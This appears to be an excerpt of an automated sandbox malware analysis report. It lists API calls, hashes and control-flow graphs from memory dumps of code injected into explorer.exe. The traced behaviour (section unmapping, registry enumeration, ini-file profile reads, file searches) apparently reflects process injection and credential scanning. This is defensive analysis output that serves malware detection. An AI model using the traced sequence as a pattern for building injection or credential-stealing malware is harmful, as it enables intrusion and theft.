                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: ,$7$9
                                                                        • API String ID: 2221118986-1653249994
                                                                        • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                        • Instruction ID: fcdcbb973bf17bc347285512a2191134428667ceef6c4bc0fbd0bb4d2a602b4c
                                                                        • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                        • Instruction Fuzzy Hash: 6C318F755083849FD730DF60D880B8FBBE8AF85340F00492EE98997291EBB1E548CB93
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00000000,00000000,?,03272E75,PathToExe,00000000,00000000), ref: 03271BCC
                                                                        • StrStrIW.SHLWAPI(00000000,.exe,?,03272E75,PathToExe,00000000,00000000), ref: 03271BF0
                                                                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,03272E75,PathToExe,00000000,00000000), ref: 03271C05
                                                                        • lstrlenW.KERNEL32(00000000,?,03272E75,PathToExe,00000000,00000000), ref: 03271C1C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: .exe
                                                                        • API String ID: 1659193697-4119554291
                                                                        • Opcode ID: b8f7227160735458d19ee2a8f993cc91ddff62992279df8e4dd8bc8af9a8fddf
                                                                        • Instruction ID: 1ad5db94e96d63f2eb7d3de94d482008f0c54648189e1366fc938c76c372d987
                                                                        • Opcode Fuzzy Hash: b8f7227160735458d19ee2a8f993cc91ddff62992279df8e4dd8bc8af9a8fddf
                                                                        • Instruction Fuzzy Hash: 04F0FC313302229BD334AF75AC496BF6295FF01741718582DE082D3151F7B099D1C759
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 03272127
                                                                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0327213A
                                                                        • wsprintfA.USER32 ref: 0327214F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                        • String ID: %li
                                                                        • API String ID: 4120667308-1021419598
                                                                        • Opcode ID: e8e6343fa449d1437860ec136c511e92767258589b2df03395ec494be02ea84e
                                                                        • Instruction ID: dc28736dc52c46dbc1dcce6a5ec182ee3afe41890a74189641a06d99cf1b3f5c
                                                                        • Opcode Fuzzy Hash: e8e6343fa449d1437860ec136c511e92767258589b2df03395ec494be02ea84e
                                                                        • Instruction Fuzzy Hash: DEE0D8326603087BC7207BB9AC0AFEF7B6CDF40A56F044295F900E6646D5F29A6483D5
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,00000018), ref: 0328316F
                                                                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 032831D2
                                                                        • _alldiv.NTDLL(?,?,00000000), ref: 032832DE
                                                                        • _allmul.NTDLL(00000000,?,00000000), ref: 032832E7
                                                                        • _allmul.NTDLL(?,00000000,?,?), ref: 03283392
                                                                          • Part of subcall function 032816CD: memset.NTDLL ref: 0328172B
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul$_alldivmemset
                                                                        • String ID:
                                                                        • API String ID: 3880648599-0
                                                                        • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                        • Instruction ID: d3b5dd23dc3568069600faeb8c54b1aa98b767bf20462dfcb31b00bf78899747
                                                                        • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                        • Instruction Fuzzy Hash: C8D1A2796253418FDB24EF69C48075EB7E5FF84B04F18492DFA9587290DBB0D885CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FOREIGN KEY constraint failed$new$old
                                                                        • API String ID: 0-384346570
                                                                        • Opcode ID: 333e604fb8c4f4df345e58c5f674546dd3790475c15ca1ba3d6162b20a3cb80b
                                                                        • Instruction ID: 9ffd3bcb0a42f5323f0b6a3fd280e6acb5db9b271834600c2edd561b67a6d788
                                                                        • Opcode Fuzzy Hash: 333e604fb8c4f4df345e58c5f674546dd3790475c15ca1ba3d6162b20a3cb80b
                                                                        • Instruction Fuzzy Hash: E1D13B747187019FEB18DF29D480B2FBBE9ABC8750F14491EF9458B290DBB4D981CB92
                                                                        APIs
                                                                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 032796E7
                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 03279707
                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 03279739
                                                                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0327976C
                                                                        • _allmul.NTDLL(?,?,?,?), ref: 03279798
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldiv$_allmul
                                                                        • String ID:
                                                                        • API String ID: 4215241517-0
                                                                        • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                        • Instruction ID: cc414f0b1d7ffaf68729d9b578ac6e53136f51abe7c28a452e5dfc6105c93347
                                                                        • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                        • Instruction Fuzzy Hash: ED210ABA5747961BD734DD1B4CC0BEBB59EFB966A1F28022DED0186250EBF294C08161
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,00000000), ref: 0328B1B3
                                                                        • _alldvrm.NTDLL(?,?,00000000), ref: 0328B20F
                                                                        • _allrem.NTDLL(?,00000000,?,?), ref: 0328B28A
                                                                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0328B298
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldvrm_allmul_allremmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1484705121-0
                                                                        • Opcode ID: 3766a68bedd863e95d934f15287972b5f793fcad9d4dc72eb3d2845f8db0f868
                                                                        • Instruction ID: e1d90b59a3e770c99f4c7753ae3d2ed2feb5ce117b1b9654048608342150c382
                                                                        • Opcode Fuzzy Hash: 3766a68bedd863e95d934f15287972b5f793fcad9d4dc72eb3d2845f8db0f868
                                                                        • Instruction Fuzzy Hash: 4C4139796293419FC714EF15C89092FFBE5AFC8600F04892DF9958B291DB71EC85CB92
                                                                        APIs
                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 032718A7
                                                                        • GlobalLock.KERNEL32(03274B57), ref: 032718B6
                                                                        • GlobalUnlock.KERNEL32(?), ref: 032718F4
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 032718E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 1688112647-0
                                                                        • Opcode ID: 53fe5c75ce735af9f328831f578cfa4e1cfb8c6bf62a0f6aff7af70ddc1665ae
                                                                        • Instruction ID: ea82051fe23ab4ebb4c5e98b49454caac3ce8a9d40d8c1276cfecb744515b444
                                                                        • Opcode Fuzzy Hash: 53fe5c75ce735af9f328831f578cfa4e1cfb8c6bf62a0f6aff7af70ddc1665ae
                                                                        • Instruction Fuzzy Hash: AE018175220306AF9B01AF25E81889FBBEDFF85651B08C43EF855C7210DF75E9649B20
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                        • lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                        • lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                        • lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatlstrlen
                                                                        • String ID:
                                                                        • API String ID: 1475610065-0
                                                                        • Opcode ID: 5865bb4346489ae25159500cf0cf49f1f3ff7367ee7cbdbf3d051c9a474b3767
                                                                        • Instruction ID: eec2b10d65ebcab3a0cb7f2af18dc4fdf91f776c3087dd8a4ce2efb0cff01854
                                                                        • Opcode Fuzzy Hash: 5865bb4346489ae25159500cf0cf49f1f3ff7367ee7cbdbf3d051c9a474b3767
                                                                        • Instruction Fuzzy Hash: 3EE09B6631021D5B8714B6AE6C94D7B779CEEC95A530D0079FA05D3305FE66EC0546B0
                                                                        APIs
                                                                          • Part of subcall function 03276A81: memset.NTDLL ref: 03276A9C
                                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0329F2A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _aulldivmemset
                                                                        • String ID: %llu$%llu
                                                                        • API String ID: 714058258-4283164361
                                                                        • Opcode ID: d222aed75d6ee5ebae811873785402d36b90fe3116ab5fa1249bc87a04b1d014
                                                                        • Instruction ID: 0cd9697d1f2bdee2fa55a3df2305d28c7416f214f94ffe2cb18b883e5180d25d
                                                                        • Opcode Fuzzy Hash: d222aed75d6ee5ebae811873785402d36b90fe3116ab5fa1249bc87a04b1d014
                                                                        • Instruction Fuzzy Hash: 9821CFB6A607057BDB10EA248C41F7AB758AF81730F044229B9219B6C0DBA1AD918AE1
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,?), ref: 03282174
                                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 0328220E
                                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 03282241
                                                                        • _allmul.NTDLL(03272E26,00000000,?,?), ref: 03282295
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul
                                                                        • String ID:
                                                                        • API String ID: 4029198491-0
                                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                        • Instruction ID: bac8ffc0e07ee2815379e36243d7a6d0e7e2aa50df525fc81d66bdb740a210e8
                                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                        • Instruction Fuzzy Hash: 83A17C74729706DFC714EF69C490A2EB7E9AF88704F04492DF6558B294EBB0EC818B42
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID:
                                                                        • API String ID: 1297977491-0
                                                                        • Opcode ID: 78434c0900277a6aa22a8789dcaf8fdef7a1cd05dfc0f263744cb3fc992415b6
                                                                        • Instruction ID: bf37fbc53282b78fccbc371d6c59c7501fd19e5a0a26dca6e5f31aba9d13477e
                                                                        • Opcode Fuzzy Hash: 78434c0900277a6aa22a8789dcaf8fdef7a1cd05dfc0f263744cb3fc992415b6
                                                                        • Instruction Fuzzy Hash: 7F81C4756293159FC350EF2DC880A2BBBE5FF88604F14496DF8898B291D770E985CB91
                                                                        APIs
                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,03272783), ref: 0327192B
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,03272783), ref: 03271930
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 03271946
                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 0327194A
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatlstrlen
                                                                        • String ID:
                                                                        • API String ID: 1475610065-0
                                                                        • Opcode ID: e5c1d5da5f1b078ab9049d5adf59cb15856bac40fa3cb6ccc533f47e8f11ffd1
                                                                        • Instruction ID: 8346add313f8a481cbe4254ce77c886418c04da1ede9462c7709fcdd85658739
                                                                        • Opcode Fuzzy Hash: e5c1d5da5f1b078ab9049d5adf59cb15856bac40fa3cb6ccc533f47e8f11ffd1
                                                                        • Instruction Fuzzy Hash: 74E09B6631021D5B4720B6AE6C84D7B76DCEEC55A530D0175F905D3305EEA5AC0186B0

                                                                        Execution Graph

                                                                        Execution Coverage: 21.7%
                                                                        Dynamic/Decrypted Code Coverage: 87.3%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 181
                                                                        Total number of Limit Nodes: 17

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                        • Instruction ID: e0725c67f65c2af896ee9c226cd1d219abb0b36e30746fbc7e31b979eb80c14b
                                                                        • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                        • Instruction Fuzzy Hash: 5D417330718B4D5FDB54EB3894597AA73D2FBE8340F444A2AE45AC3391EF78D9048782

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        • NtUnmapViewOfSection.NTDLL ref: 001D38F2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: SectionUnmapView
                                                                        • String ID:
                                                                        • API String ID: 498011366-0
                                                                        • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                        • Instruction ID: d7afa70458a50b82f9b773229a29cc8fc1395a10b81e4b2ece8b65aa48b439dc
                                                                        • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                        • Instruction Fuzzy Hash: 9AF0A030F11A082BEA6C77BD685D3282280EB68310F90062BB525C33E2DE398A458302

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE ref: 001D27C7
                                                                        • RegQueryValueExW.KERNELBASE ref: 001D27F4
                                                                        • RegQueryValueExW.KERNELBASE ref: 001D283A
                                                                        • RegCloseKey.KERNELBASE ref: 001D2860
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseFreeHeapOpen
                                                                        • String ID:
                                                                        • API String ID: 1641618270-0
                                                                        • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                        • Instruction ID: 4e7e998e761750d41a5a54e5edd1ea72fde0c9c61537ead481fb8b03583dcee9
                                                                        • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                        • Instruction Fuzzy Hash: 7A316E30208B488FE769DB28D45877ABBD0FBB8355F54062FE49AC3264DF34D8469742

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreate
                                                                        • String ID: ?
                                                                        • API String ID: 2932200918-1684325040
                                                                        • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                        • Instruction ID: b182950bdd00a600025b031e3234daaaa3e588dabaa9d198138e844f566c4a8f
                                                                        • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                        • Instruction Fuzzy Hash: 18116070618B488FD751DF69D48866AB7E1FB98345F50062FE48AC3360DF389985CB82

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE ref: 001DA397
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 001DA441
                                                                        • VirtualProtect.KERNELBASE ref: 001DA45F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D9000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d9000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 895956442-0
                                                                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                        • Instruction ID: 5768982b0f36e44076531008775d5e4297576efe290e56356b008267c4342c97
                                                                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                        • Instruction Fuzzy Hash: 7351463275891D5BCB28EA7C98942F5B7D2FF59321B98062BC49AC3384D759D8468383

                                                                        Control-flow Graph

                                                                        control_flow_graph 87 1d3254-1d3287 call 1d298c 90 1d328d-1d3297 call 1d298c 87->90 91 1d343a-1d3456 87->91 90->91 94 1d329d-1d32aa call 1d272c 90->94 97 1d32ac-1d32b3 94->97 98 1d32b5 94->98 99 1d32b7-1d32c2 call 1d2688 97->99 98->99 102 1d342c-1d3435 call 1d30a8 99->102 103 1d32c8-1d32fe call 1d2688 call 1d1838 * 2 call 1d2938 99->103 102->91 113 1d340c-1d3427 call 1d1860 * 4 103->113 114 1d3304-1d3318 GetPrivateProfileSectionNamesW 103->114 113->102 114->113 116 1d331e-1d3326 114->116 116->113 118 1d332c-1d332f 116->118 118->113 120 1d3335-1d3348 118->120 125 1d334e-1d3377 GetPrivateProfileStringW 120->125 126 1d33f0-1d3406 120->126 125->126 128 1d3379-1d3398 GetPrivateProfileIntW 125->128 126->113 126->118 129 1d339a-1d33ad call 1d2688 128->129 130 1d33e5-1d33eb call 1d30a8 128->130 135 1d33af-1d33b3 129->135 136 1d33c6-1d33e3 call 1d30a8 call 1d1860 129->136 130->126 137 1d33bd-1d33c4 135->137 138 1d33b5-1d33ba 135->138 136->126 137->135 137->136 138->137
                                                                        APIs
                                                                          • Part of subcall function 001D298C: GetFileAttributesW.KERNELBASE ref: 001D299E
                                                                        • GetPrivateProfileSectionNamesW.KERNEL32 ref: 001D330F
                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 001D336F
                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 001D338C
                                                                          • Part of subcall function 001D30A8: FindFirstFileW.KERNELBASE ref: 001D3104
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                        • String ID:
                                                                        • API String ID: 970345848-0
                                                                        • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                        • Instruction ID: e98378272e2651de6e2753318e27cd1a63479545120386f18f59f783f6cf2a44
                                                                        • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                        • Instruction Fuzzy Hash: AA51B430718F195BEB59BB2C985667972D2FBA8300B44056FE41AC3396EF78DD428387

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • StrStrIW.KERNELBASE ref: 001D347E
                                                                        • RegOpenKeyExW.KERNELBASE ref: 001D353F
                                                                        • RegEnumKeyExW.KERNELBASE ref: 001D35D6
                                                                          • Part of subcall function 001D2774: RegOpenKeyExW.KERNELBASE ref: 001D27C7
                                                                          • Part of subcall function 001D2774: RegQueryValueExW.KERNELBASE ref: 001D27F4
                                                                          • Part of subcall function 001D2774: RegQueryValueExW.KERNELBASE ref: 001D283A
                                                                          • Part of subcall function 001D2774: RegCloseKey.KERNELBASE ref: 001D2860
                                                                          • Part of subcall function 001D3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 001D330F
                                                                          • Part of subcall function 001D1860: RtlFreeHeap.NTDLL ref: 001D1880
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                        • String ID:
                                                                        • API String ID: 1841478724-0
                                                                        • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                        • Instruction ID: 0e33bd0f8b213b7608e1a87d3074433987aa4d794f61a9af5e539c9510e7d4fa
                                                                        • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                        • Instruction Fuzzy Hash: A7414830718B484FDB98EF6D949972AB6E2FBA8341F00496FA55EC3361DF34D9448B42

                                                                        Control-flow Graph

                                                                        control_flow_graph 232 1d2938-1d2943 233 1d2945-1d2948 232->233 234 1d2984 232->234 233->234 236 1d294a-1d2970 CreateFileW 233->236 235 1d2986-1d298b 234->235 237 1d2980-1d2982 236->237 238 1d2972-1d297a CloseHandle 236->238 237->235 238->237
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID:
                                                                        • API String ID: 3498533004-0
                                                                        • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                        • Instruction ID: 264686b8a3205558d5275380e21c4bc67fa738683c4cb186f0059383a4edd806
                                                                        • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                        • Instruction Fuzzy Hash: 5CF0E57021571A8FE7486FB844A8336F5D0FB18319F18463EE46AC23D0D77888428702

                                                                        Control-flow Graph

                                                                        control_flow_graph 251 1d22b4-1d22c6 252 1d22c8-1d22d0 CreateStreamOnHGlobal 251->252 253 1d22d6-1d22e6 251->253 252->253
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE ref: 001D22D0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateGlobalStream
                                                                        • String ID:
                                                                        • API String ID: 2244384528-0
                                                                        • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                        • Instruction ID: 90f727c0e57445b95457ab55e376c8520b97de21b185cfb7d751038cfe3d5542
                                                                        • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                        • Instruction Fuzzy Hash: 50E08C30108B0A8FD758AFBCE4CA07A33A1EBAC252B05053FE005CB114D27988C18741

                                                                        Control-flow Graph

                                                                        control_flow_graph 254 1d298c-1d2997 255 1d2999-1d299c 254->255 256 1d29b5 254->256 255->256 257 1d299e-1d29a7 GetFileAttributesW 255->257 258 1d29b7-1d29bc 256->258 259 1d29a9-1d29af 257->259 260 1d29b1-1d29b3 257->260 259->260 260->258
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE ref: 001D299E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                        • Instruction ID: c92bfb55fac26fb4ccd0511eb5877d43910f68b3fb52d136159fb6de357868a1
                                                                        • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                        • Instruction Fuzzy Hash: 1CD05E22612915076B6C26F908E927120A0D73932EB94022BEA36C13A0E3A5C895A201

                                                                        Control-flow Graph

                                                                        control_flow_graph 261 1d1860-1d1870 call 1d1ad4 264 1d1886-1d188b 261->264 265 1d1872-1d1880 RtlFreeHeap 261->265 265->264
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2946927222.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
